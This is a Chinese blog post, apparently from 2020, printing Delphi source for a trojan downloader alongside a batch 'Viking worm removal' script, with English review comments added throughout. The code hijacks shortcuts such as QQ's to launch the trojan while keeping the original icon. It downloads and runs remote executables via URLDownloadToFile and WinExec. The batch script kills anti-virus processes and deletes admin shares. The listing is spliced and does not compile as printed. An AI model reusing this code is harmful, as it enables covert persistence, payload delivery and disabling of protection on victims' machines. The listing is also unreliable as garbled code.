delphi小熊下载者源码,恶意修改快捷方式
发布时间:2020-01-04 23:06

// Program header of the Delphi downloader whose fragments appear further down
// the page.  The name suggests self-injection, but no injection code is in the
// visible listing -- treat the name as a label, not a description.
 program InjectTheSelf;

@echo off
rem Viking / logo_1 "removal" script exactly as printed on the page.
rem REVIEW NOTES, read before running any of this:
rem  1. Every path below lost its backslash in extraction: "windir rundl132.exe"
rem     was windir\rundl132.exe, "c:go.exe" was c:\go.exe, and so on.  As
rem     printed, none of the del, attrib or echo lines hit the intended file.
rem  2. Lines that start with // are NOT batch comments.  cmd tries to run them
rem     as commands, prints "is not recognized" and carries on.  Use rem.
rem  3. Besides stopping the worm this script kills anti-virus processes,
rem     plants decoy files named like system binaries and removes the
rem     administrative shares -- the same things the worm itself is known for.
rem     Treat it as a sample to study, not as a removal tool; use a vendor tool
rem     on a real infection.
title 清除威金(logo_1,熊猫烧香)病毒最新变种工具
@echo 清除VIKING病毒最新变种工具
pause
rem Report whether the two best-known dropper names are present.  Nothing
rem depends on the answer: every kill and delete step below runs regardless.
if exist %windir%rundl132.exe echo ---报告老大,发现有威金病毒埋伏! 让我来干掉它-----
if exist %windir%logo_1.exe echo ---报告老大,发现有威金病毒埋伏!让我来干掉它 -----
rem (author's comment, "kill the Viking processes" -- executed, see note 2)
//杀viking进程
rem Process names the author attributes to the worm.  tskill takes the image
rem name without the .exe suffix.
tskill logo_1
tskill rundl132
tskill zt
tskill wow
tskill logo1_
rem The next six are NOT worm processes.  Ravmon, Ravmond, Eghost and Mailmon
rem are Rising anti-virus components, KAVPFW is Kingsoft's firewall, IPARMOR
rem is Jiangmin's.  A cleaner has no reason to stop the resident AV; this is
rem the worm's own kill list.
tskill Ravmon
tskill Eghost
tskill Mailmon
tskill KAVPFW
tskill IPARMOR
tskill Ravmond
rem Numbered copies the author expects the worm to run; /f forces termination.
taskkill /f /im 0sy.exe
taskkill /f /im 1sy.exe
taskkill /f /im 2sy.exe
taskkill /f /im 3sy.exe
taskkill /f /im 4sy.exe
taskkill /f /im 5sy.exe
taskkill /f /im 6sy.exe
taskkill /f /im 7sy.exe
taskkill /f /im 8sy.exe
taskkill /f /im 9sy.exe
rem (author's comment, "delete the trojan" -- executed, see note 2)
//删除木马
rem Forced, recursive delete of _desktop.ini across D: regardless of
rem attributes (the worm's per-directory marker, per public write-ups), then
rem single copies under Program Files and the Windows directory.
del d:_desktop.ini /f/s/q/a
del c:Program Files_desktop.ini
rem DLLs dropped in the windir subdirectories MickNew, MH_FILE and TODAYZTKING.
del %Windir%MickNewMickNew.dll
del %Windir%MH_FILEMH_DLL.dll
del %Windir%_desktop.ini
del %Windir%TODAYZTKINGTODAYZTKING.DLL
rem Drives C: to J: -- strip hidden, system and read-only, then delete the
rem autorun payload: go.exe, setup.exe and the autorun.inf that launches it.
attrib -h -r -s c:go.exe
del c:go.exe
del c:setup.exe
attrib -h -s -r c:autorun.inf
del c:autorun.inf
attrib -h -r -s d:go.exe
del d:go.exe
del d:setup.exe
attrib -h -s -r d:autorun.inf
del d:autorun.inf
del e:setup.exe
attrib -h -r -s e:go.exe
del e:go.exe
attrib -h -s -r e:autorun.inf
del e:autorun.inf
attrib -h -r -s f:go.exe
del f:go.exe
del f:setup.exe
attrib -h -s -r f:autorun.inf
del f:autorun.inf
attrib -h -r -s g:go.exe
del g:go.exe
del g:setup.exe
attrib -h -s -r g:autorun.inf
del g:autorun.inf
rem BUG from H: onwards: the three attrib lines still name g:autorun.inf
rem (copy-paste), and go.exe gets no attrib at all.  del skips hidden files
rem and refuses read-only ones, so a hidden or read-only copy on H:, I: or J:
rem survives every del below.
del h:go.exe
del h:setup.exe
attrib -h -s -r g:autorun.inf
del h:autorun.inf
del i:go.exe
attrib -h -s -r g:autorun.inf
del i:autorun.inf
del i:setup.exe
del j:go.exe
attrib -h -s -r g:autorun.inf
del j:autorun.inf
del j:setup.exe
rem BUG: two commands fused onto one line.  del receives the two arguments
rem "...systemLogo1_.exedel" and "...systemLogo_1.exe", so Logo_1.exe in
rem windir\system is deleted but Logo1_.exe is not.
del %windir%systemLogo1_.exedel %windir%systemLogo_1.exe
rem The main dropper and its helper files in the Windows directory.
del %windir%rundl132.exe
del %windir%vDll.dll
del %windir%Dll.dll
del %windir%Sy.exe
del %windir%1Sy.exe
del %windir%2Sy.exe
del %windir%3Sy.exe
del %windir%5Sy.exe
del %windir%1.com
rem The caret is cmd's escape character, so the smiley prints as "_ ".
@echo ^_^ 报告老大,VIKING已经全都被处死
rem Offer the "immunisation" step; Ctrl-C at this pause skips it.
@echo 真累哈,再给你的系统免疫下,不需要的话请直接退出
pause
rem (author's comment, "immunise the system" -- executed, see note 2)
//免疫系统
rem Immunisation by placeholder: create a file with every name the worm is
rem expected to drop (echo with no arguments writes the text "ECHO is on.")
rem and then mark it system, read-only and hidden, presumably so the worm's
rem own file write fails.  Two cautions:
rem  a. rundll32.exe, SVCHOST.exe and WINLOGON.exe are created in the Windows
rem     directory, not System32, so the real binaries are not replaced -- but
rem     a hidden, read-only rundll32.exe outside System32 is exactly what a
rem     scanner or EDR flags as masquerading malware, and it stays there.
rem  b. rundll32.exe and RUNDLL32.EXE are the same file on a case-insensitive
rem     file system; the second echo just overwrites the first.
echo > %windir%Logo1_.exe
echo > %windir%rundl132.exe
echo > %windir%Sy.exe
echo > %windir%vDll.dll
echo > %windir%1Sy.exe
echo > %windir%2Sy.exe
echo > %windir%rundll32.exe
echo > %windir%3Sy.exe
echo > %windir%5Sy.exe
echo > %windir%1.com
echo > %windir%exerouter.exe
echo > %windir%EXP10RER.com
echo > %windir%finders.com
echo > %windir%Shell.sys
echo > %windir%kill.exe
echo > %windir%sws.dll
echo > %windir%sws32.dll
echo > %windir%uninstallrundl132.exe
echo > %windir%SVCHOST.exe
echo > %windir%WINLOGON.exe
echo > %windir%RUNDLL32.EXE
echo > C:"Program Files"svchost.exe
echo > C:"Program Files""Internet Explorer"svchost.exe
echo > %windir%Downloadsvchost.exe
echo > %windir%system32wldll.dll
rem Same list again, locking each placeholder as system + read-only + hidden.
attrib %windir%Logo1_.exe +s +r +h
attrib %windir%rundl132.exe +s +r +h
attrib %windir%Sy.exe +s +r +h
attrib %windir%vDll.dll +s +r +h
attrib %windir%1Sy.exe +s +r +h
attrib %windir%2Sy.exe +s +r +h
attrib %windir%rundll32.exe +s +r +h
attrib %windir%3Sy.exe +s +r +h
attrib %windir%5Sy.exe +s +r +h
attrib %windir%1.com +s +r +h
attrib %windir%exerouter.exe +s +r +h
attrib %windir%EXP10RER.com +s +r +h
attrib %windir%finders.com +s +r +h
attrib %windir%Shell.sys +s +r +h
attrib %windir%kill.exe +s +r +h
attrib %windir%sws.dll +s +r +h
attrib %windir%sws32.dll +s +r +h
attrib %windir%uninstallrundl132.exe +s +r +h
attrib %windir%SVCHOST.exe +s +r +h
attrib %windir%WINLOGON.exe +s +r +h
attrib %windir%RUNDLL32.EXE +s +r +h
attrib C:"Program Files"svchost.exe +s +r +h
attrib C:"Program Files""Internet Explorer"svchost.exe +s +r +h
attrib %windir%Downloadsvchost.exe +s +r +h
attrib %windir%system32wldll.dll +s +r +h
rem Remove the administrative shares the worm is reported to spread through.
rem The Server service recreates them at the next reboot, so this is a
rem stop-gap only; dropping ipc$ also breaks remote administration until then.
net share c$ /del
net share d$ /del
net share e$ /del
net share f$ /del
net share admin$ /del
net share ipc$ /del
cls
rem Closing banner.  "盗攻网络" appears to be the author's group tag, not a vendor.
@echo -------------------------------------
@echo viking已经全部被我杀完拉,哈,厉害吧
@echo 盗攻网络提醒您:系统已经成功免疫!
@echo 谢谢你的使用,请重启您的电脑!
@echo -------------------------------------
pause

 

 type
PTIMPORT_CODE=^TIMPORT_CODE;
// Overlay for the first six bytes of an import thunk: the two-byte opcode
// FF 25 (x86 "jmp dword ptr [imm32]") followed by the 32-bit address of the
// IAT slot.  GetAPIAddress casts a function pointer to this, compares JmpPtr
// with $25FF (FF 25 read little-endian) and, on a match, dereferences PtrAdd
// to obtain the address actually stored in the IAT.  packed keeps the layout
// at exactly 2 + 4 bytes.
TIMPORT_CODE=packed record
JmpPtr:Word;      // opcode bytes; $25FF when this really is an import thunk
PtrAdd:^Pointer;  // points at the IAT slot (4 bytes on 32-bit)
end;

// Non-default image base ($13140000 instead of the usual $00400000).
// Presumably chosen so the module does not collide with a host process it is
// loaded into; the code that would need that is not in the visible listing
// (TODO confirm).  An unusual image base is also a cheap static indicator.
{$IMAGEBASE $13140000}

单元 ShlObj,   ComObj,   ActiveX;

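// Shell32's SHFormatDrive, which opens the shell "Format" dialog for a drive.
// In the visible code it is never called: it is imported only so that
// Button1Click can compare the address behind this module's import thunk
// (via GetAPIAddress) with what GetProcAddress returns, i.e. an IAT-hook
// check.  Keep it that way; calling it formats media.
//   hWnd     owner window for the dialog
//   Drive    zero-based drive number (0 = A:)
//   fmtID    format ID, usually SHFMT_ID_DEFAULT
//   Options  SHFMT_OPT_* flags
// Returns the last successful format ID, or a negative SHFMT_* error code.
// Fixed against the printed line: the ';' before stdcall was missing and a
// stray note ("声明一下" -- "declare it") was pasted onto the end, so this
// declaration did not compile.  In a Delphi program it must also follow the
// uses clause, not precede it as printed.
function SHFormatDrive(hWnd: HWND;
  Drive: Word;
  fmtID: Word;
  Options: Word): Longint;
  stdcall; external 'Shell32.dll' Name 'SHFormatDrive';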

uses
  Windows,
  SysUtils,
  urlmon,
  sendmail,
  shellapi,
  tlhelp32;

修改快捷方式的启动目标,不改变原图标样子,反正QQ这种是用户每次开机就运行的,就连同我们的马一起运行了呗.

// Resolves an import thunk to the address the IAT currently holds.
//   ApiPtr  a function pointer as the compiler sees it (e.g. @SHFormatDrive)
// If the bytes at ApiPtr are FF 25 (jmp dword ptr [imm32]) the function
// returns the value stored in the referenced IAT slot; otherwise ApiPtr is
// returned unchanged.  nil in, nil out.  Any access violation while reading
// through the pointers is swallowed and reported as nil.
function GetAPIAddress(ApiPtr: Pointer): Pointer;
var
  Thunk: PTIMPORT_CODE;
begin
  if ApiPtr = nil then
  begin
    Result := nil;
    Exit;
  end;
  Result := ApiPtr;
  Thunk := PTIMPORT_CODE(ApiPtr);
  try
    // Not an indirect jmp: the pointer already is the function body.
    if Thunk.JmpPtr <> $25FF then
      Exit;
    Result := Thunk.PtrAdd^;
  except
    Result := nil;
  end;
end;

var
MSG:TMSG;                          // message-loop state; the loop itself is not in the visible listing
kkk:string;
cTime: TDateTime;
hModule, hModule_News: Pointer;
Extent, Size, ThreadId: longword;
//ProcessHandle, Pid: longword;
sysdir:array[0..145] of char;      // 146-char buffer, not MAX_PATH -- whatever fills it must respect that
ret2:HKEY;                         // registry key handle; its use is not in the visible listing
window:HWND;
htimer1,k,n,main:integer;          // k and main are the Sleep() delays used by Download; how they are derived is not shown
// Build-time configuration.  These are initialised globals ("typed
// constants") held as plain strings in the binary, so they can be patched
// without recompiling -- presumably why the url fields that follow are just
// 'http://' padded with blanks (TODO confirm; the builder is not shown).
// The flags are all '1' here; the code that reads kill, infectl and static
// is not in the visible listing, so their exact meaning is unconfirmed.
//time:pchar='5';
//timemain:pchar='5';
time:pchar='999';                  // delay as text
timemain:pchar='9999';             // delay as text
kill:pchar='1';
infectl:pchar='1';                 // by name, the "infect" switch (e.g. the shortcut rewrite) -- unconfirmed
static:pchar='1';
// The commented-out originals still carry the author's test host,
// www.16518.net/test/1.exe -- a historical indicator worth keeping on file.
//urllabel:pchar='http://www.16518.net/test/1.exe';
//url1:  pchar='http://www.16518.net/test/1.exe';
urllabel: pchar ='http://                                                                                                                                                                                                                             ';
url1:  pchar ='http://                                                                                                                                                                                                                              ';
url2:  pchar ='http://                                                                                                                                                                                                                              ';
url3:  pchar ='http://                                                                                                                                                                                                                              ';
url4:  pchar ='http://                                                                                                                                                                                                                              ';
url5:  pchar ='http://                                                                                                                                                                                                                              ';
url6:  pchar ='http://                                                                                                                                                                                                                              ';
url7:  pchar ='http://                                                                                                                                                                                                                              ';
url8:  pchar ='http://                                                                                                                                                                                                                              ';
url9:  pchar ='http://                                                                                                                                                                                                                              ';
url10: pchar ='http://                                                                                                                                                                                                                              ';
url11: pchar ='http://                                                                                                                                                                                                                              ';
urlfirst:  pchar ='http://                                                                                                                                                                                                                              ';
urldown:  pchar ='http://                                                                                                                                                                                                                              ';
urlupdate: pchar ='http://                                                                                                                                                                                     ';
delself:pchar='1';                 // by name, a self-delete switch ('1' = on); the code that reads it is not in the visible listing

马在运行时会自动开启QQ,这样用户就发现不到了.

// NOTE(review): from here to the "FreeLibrary(h); end;" below, several
// snippets were pasted into one another and the result does not compile.
// Button1Click itself is a small IAT-hook demo: load Shell32, take
// SHFormatDrive's address from GetProcAddress, take the address stored behind
// this module's import thunk via GetAPIAddress, and report 'IAT HOOK' when
// they differ or 'Not IAT HOOK' when they match.  Its own lines are the
// header, the two "begin / Showmessage(...)" pairs, the "end / else" that
// ended up inside the brace comment, and the closing "FreeLibrary(h); end;".
// Spliced in between are (a) a brace-commented block holding GetHostNam,
// LinkFileInfo and nametoIP, (b) SetLinkFileRun, the shortcut hijack the
// article is about, and (c) the header of tlabel, whose body is printed
// after this procedure.
procedure TForm1.Button1Click(Sender: TObject);
var
OrgSHFormatDrive: Pointer;   // address exported by Shell32, per GetProcAddress
h: Cardinal;                 // module handle from LoadLibrary
begin
h:=LoadLibrary('Shell32.dll');
OrgSHFormatDrive:=GetProcAddress(h,'SHFormatDrive');
// @SHFormatDrive is this module's import thunk; GetAPIAddress follows the
// FF 25 jmp to the IAT slot.  A hooked entry points somewhere other than
// Shell32's export.
if GetAPIAddress(@SHFormatDrive) <> OrgSHFormatDrive then

// (stray comment from another snippet: "get file size" -- nothing in this procedure reads a file size)

 

begin
Showmessage('IAT HOOK');

{
// -- Everything up to the closing brace is commented out in the original. --

// GetHostNam: returns the local computer name via GetComputerName, or '' if
// the buffer stays empty.  The return value of GetComputerName is not checked.
function GetHostNam:String;
var
ComputerName: array[0..MAX_COMPUTERNAME_LENGTH+1] of char;
Size: Cardinal;
begin
result:='';
Size := MAX_COMPUTERNAME_LENGTH+1;
GetComputerName(ComputerName, Size);
Result:=StrPas(ComputerName);
end;

// LinkFileInfo: read (bSet = False) or rewrite (bSet = True) a .lnk file
// through IShellLink / IPersistFile.
//   lnkFileName  path of the .lnk
//   info         LINK_FILE_INFO record (type not in the visible listing; the
//                strpcopy calls in SetLinkFileRun imply fixed char arrays --
//                confirm)
//   bSet         False: fill info from the link; True: push info into it
// Returns True on success.  Notes for reviewers:
//  - CoInitialize is called on every invocation and never balanced by
//    CoUninitialize.
//  - buf is MAX_PATH bytes, but StringToWideChar's limit is a WideChar count,
//    so a link path longer than roughly MAX_PATH div 2 characters overruns
//    it -- TODO confirm DestSize semantics for this Delphi version.
//  - In the bSet branch the new values are only pushed into the in-memory
//    link object; there is no IPersistFile.Save call, so whether the change
//    reaches disk rests on Resolve(0, SLR_UPDATE) -- confirm.
//  - SetIDList is deliberately skipped (author's note below), so the PIDL
//    still describes the OLD target while the path names the NEW one.
function LinkFileInfo(const lnkFileName:string;var info:LINK_FILE_INFO;const bSet:boolean):boolean;
var
 hr:hresult;
 psl:IShelllink;
 wfd:win32_find_data;
 ppf:IPersistFile;
 lpw:pwidechar;
 buf:pwidechar;
begin
 result:=false;
 getmem(buf,MAX_PATH);
 try
 if SUCCEEDED(CoInitialize(nil)) then
 if (succeeded(cocreateinstance(clsid_shelllink,nil,clsctx_inproc_server,IID_IShellLinkA,psl))) then
 begin
   hr:=psl.QueryInterface(iPersistFile,ppf);
   if succeeded(hr) then
   begin
     lpw:=stringtowidechar(lnkfilename,buf,MAX_PATH);
     hr := ppf.Load(lpw, STGM_READ);
     if succeeded(hr) then
     begin
       // SLR_NO_UI: resolve without ever showing a dialog to the user.
       hr := psl.Resolve(0, SLR_NO_UI);
       if succeeded(hr) then
       begin
         if bSet then
         begin
           psl.SetArguments(info.Arguments);
           psl.SetDescription(info.Description);
           psl.SetHotkey(info.HotKey);
           psl.SetIconLocation(info.IconLocation,info.IconIndex);
           //psl.SetIDList(info.ItemIDList);      // author: leave this disabled, otherwise the icon is hard to swap
           psl.SetPath(info.FileName);
           psl.SetShowCmd(info.ShowState);
           psl.SetRelativePath(info.RelativePath,0);
           psl.SetWorkingDirectory(info.WorkDirectory);
           result:=succeeded(psl.Resolve(0,SLR_UPDATE));
         end
         else
         begin
           psl.GetPath(info.FileName,MAX_PATH, wfd,SLGP_SHORTPATH );
           psl.GetIconLocation(info.IconLocation,MAX_PATH,info.IconIndex);
           psl.GetWorkingDirectory(info.WorkDirectory,MAX_PATH);
           psl.GetDescription(info.Description,CCH_MAXNAME);
           psl.GetArguments(info.Arguments,MAX_PATH);
           psl.GetHotkey(info.HotKey);
           psl.GetIDList(info.ItemIDList);
           psl.GetShowCmd(info.ShowState);
           result:=true;
         end;
       end;
     end;
   end;
end;
 finally
 freemem(buf);
 end;
end;

// The next two lines are Button1Click's "end else", swallowed by this brace
// comment when the snippets were pasted together.
end
else

// nametoIP: collects every IPv4 address of this host (gethostname ->
// gethostbyname -> h_addr_list) into a comma-separated string and stores it
// in the global trueip, which is declared elsewhere.  WSAStartup/WSACleanup
// bracket the call, but the early exit on a failed gethostbyname skips
// WSACleanup, and the try/except around the assignment swallows any error.
// Presumably part of the victim fingerprint sent upstream (sendmail is in
// the uses clause) -- not shown here.
procedure nametoIP;
type
  TaPInAddr = array[0..255] of PInAddr;
  PaPInAddr = ^TaPInAddr;
var
  phe: PHostEnt;
  pptr: PaPInAddr;
  Buffer: array[0..63] of char;
  i: integer;
  GInitData: TWSADATA;
  temp:string;
begin
  wsastartup($101, GInitData);
  Temp := '';
  GetHostName(Buffer, SizeOf(Buffer));
  phe := GetHostByName(buffer);
  if not assigned(phe) then
    exit;
  pptr := PaPInAddr(Phe^.h_addr_list);
  i := 0;
  while pptr^[I] <> nil do begin
    Temp := Temp + StrPas(inet_ntoa(pptr^[I]^)) + ',';
    inc(i);
  end;
  // Drop the trailing comma.
  Delete(Temp, Length(Temp), 1);
  try
    trueip :=Temp;
  except
  end;
  wsacleanup;
end;
      }

// SetLinkFileRun: retarget an existing shortcut at NewRunPath while keeping
// its icon -- the persistence trick the article describes (the QQ shortcut
// the user clicks at every boot keeps looking like QQ but now launches the
// downloader).
//   LinkFilePath  the .lnk to rewrite
//   NewRunPath    the executable it should launch from now on
// How the icon survives: IconLocation is set to the OLD target
// (info2.FileName) with IconIndex 0.  For defenders that is the tell: a .lnk
// whose target and icon source disagree, with the original target still
// recoverable from the icon path.
// Defects: info3 is never zeroed, so Arguments, ShowState, RelativePath and
// ItemIDList are written from whatever the stack held (unless
// LINK_FILE_INFO holds managed types); both LinkFileInfo results are
// ignored; and LinkFileInfo itself sits inside a brace comment in this
// listing, so nothing here compiles as printed.
procedure  SetLinkFileRun(LinkFilePath:string;NewRunPath:string);
var
info2,info3:LINK_FILE_INFO;
begin
   LinkFileInfo(LinkFilePath,info2,False);
   strpcopy(info3.FileName,NewRunPath);
   strpcopy(info3.WorkDirectory,ExtractfilePath(NewRunPath));
   info3.Description:=info2.Description;
   strpcopy(info3.IconLocation,info2.FileName);    // use the shortcut's ORIGINAL target as the icon source; otherwise the icon becomes that of the new target (the author's D:\a.exe)
   info3.IconIndex:=0;   // index 0 for the same reason -- any other value replaces the original icon
   info3.HotKey:=0;
   LinkFileInfo(LinkFilePath,info3,True);
end;

// Button1Click's else branch.
begin
Showmessage('Not IAT HOOK');

// Header of tlabel; its body (begin ... end;) is printed after this
// procedure.  i and disk are declared but unused in the visible body.
procedure tlabel();
var
f:textfile;
i:integer;
buffer,disk:string;

 

// Closes the else-branch begin above.
end;
FreeLibrary(h);
end;

// Body of tlabel (its header is printed above, inside the pasted-together
// Button1Click).  Writes a first-run marker file.  The path lost its
// separators in extraction; read it as C:\program files\label.tmp.
// The FileExists branch is redundant: both arms end in Rewrite(F), which
// creates or truncates the file either way, and AssignFile is repeated.
// Rewrite runs with I/O checking off; if it fails (Program Files is not
// writable without elevation on Vista and later) the procedure exits
// silently and the marker is never written.  For responders: label.tmp
// containing the text "first run" under Program Files is an artefact of
// this downloader, as are temp.tmp, system1.exe and system2.exe from the
// Download procedure below.
begin

 

buffer:='first run';
Assignfile(F,'C:program fileslabel.tmp');
if not FileExists('C:program fileslabel.tmp') Then
begin
Rewrite(F);
Closefile(F);
End
Else  Assignfile(F,'C:program fileslabel.tmp');
{$I-}
Rewrite(F);
{$I+}
If IOResult<> 0 Then  exit;   // silent give-up; nothing is logged or retried
//Write(F,Memo_gettxt.Text);
//Memo_gettxt.Text:='';
Write(F,buffer);              // "first run", no line terminator

// (figure caption spilled into the listing by extraction -- "an incorrectly
//  modified shortcut"; it belongs with the figure placeholder that follows
//  this procedure)
修改不当的快捷方式:

Closefile(F);
end;

图片 1 图片 2

procedure Download; //下载过程
begin
sleep(main);
URLDownloadToFile(nil,urllabel, 'C:program filestemp.tmp', 0, nil);
//WinExec('C:program filessystem1.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
if FileExists('c:Program Filestemp.tmp') then
begin

 

URLDownloadToFile(nil, url1, 'c:Program Filessystem1.exe', 0, nil);
WinExec('c:Program Filessystem1.exe', SW_SHOW); //SW_SHOW or SW_HIDE

// [figure caption displaced into the code listing by extraction] 完美修改后的快捷方式 -- the shortcut after the "clean" modification (target replaced, icon unchanged)

sleep(k);

// [figure 3 placeholder displaced into the code listing by extraction] 图片 3

URLDownloadToFile(nil, url2, 'c:Program Filessystem2.exe', 0, nil);
WinExec('c:Program Filessystem2.exe', SW_SHOW); //SW_SHOW or SW_HIDE
